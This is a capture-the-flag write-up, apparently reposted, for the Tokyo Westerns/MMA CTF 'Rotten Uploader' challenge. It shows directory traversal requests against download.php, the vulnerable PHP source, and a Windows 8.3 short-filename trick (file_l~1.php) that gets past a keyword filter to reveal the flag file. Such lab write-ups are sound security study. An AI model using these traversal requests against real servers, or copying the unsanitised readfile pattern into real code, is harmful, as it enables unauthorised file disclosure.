Tokyo Westerns/MMA CTF - Rotten Uploader

来源:互联网 发布:小米6 移动4g网络差 编辑:程序博客网 时间:2024/05/08 07:01

The download links had the following format: download.php?f=test.cpp

The script was vulnerable to directory traversal, allowing us to get the source of the index page by requesting download.php?f=../index.php which gave us the following source code:

<?php/** * */include('file_list.php');?><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0 Level 2//EN"><html>  <head>    <title>Uploader</title>  </head>  <body>    <h1>Simple Uploader</h1>    <p>There are no upload features.</p>    <h3>Files</h3>    <table width="100%" border="1">          <tr>            <th>#</th>            <th>Filename</th>            <th>Size</th>            <th>Link</th>          </tr>              <?php foreach($files as $file): ?>    <?php if($file[0]) continue; // visible flag ?>            <tr>            <td><?= $file[1]; ?></td>            <td><?= $file[2]; ?></td>            <td><?= $file[3]; ?> bytes</td>            <td><a href="download.php?f=<?= $file[4]; ?>">Download</a></td>          </tr>          <?php endforeach;?>      </table>  </body></html>

And download.php via download.php?f=../download.php:

<?phpheader("Content-Type: application/octet-stream");if(stripos($_GET['f'], 'file_list') !== FALSE) die();readfile('uploads/' . $_GET['f']); // safe_dir is enabled. ?>

Clearly the goal is getting the contents of file_list.php, but the download script checks if requested filename contains 'file_list'. After some thinking and realizing the server is running Windows, we decided to try converting the filename to 8.3 / short filename. We requesteddownload.php?f=../file_l~1.php and got file_list.php's source:

<?php$files = [  [FALSE, 1, 'test.cpp', 1135, 'test.cpp'],  [FALSE, 2, 'test.c', 74, 'test.c'],  [TRUE, 3, 'flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7', 35, 'flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7'],  [FALSE, 4, 'test.rb', 1446, 'test.rb'],];

Having the flag's filename, we downloaded it by requesting download.php?f=flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7 and received the flag: TWCTF{Hotto_Smile}

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